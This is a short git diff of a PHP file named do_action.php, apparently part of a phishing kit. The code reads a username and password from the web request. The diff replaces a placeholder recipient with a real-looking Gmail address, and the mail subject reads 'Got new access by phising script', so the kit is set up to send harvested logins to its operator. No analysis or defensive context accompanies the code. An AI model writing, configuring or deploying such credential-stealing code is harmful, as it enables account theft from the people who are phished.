diff --git a/do_action.php b/do_action.php index 25fa71a..c52438b 100644 --- a/do_action.php +++ b/do_action.php @@ -8,7 +8,7 @@ function mail_sender(){ $username = $_REQUEST['username']; $password = $_REQUEST['password']; - $reciever = "YOUR-EMAIL ADRRESS"; + $reciever = "sxannnn01@gmail.com"; $subject = "Got new access by phising script"; $message = "The username is ". $username;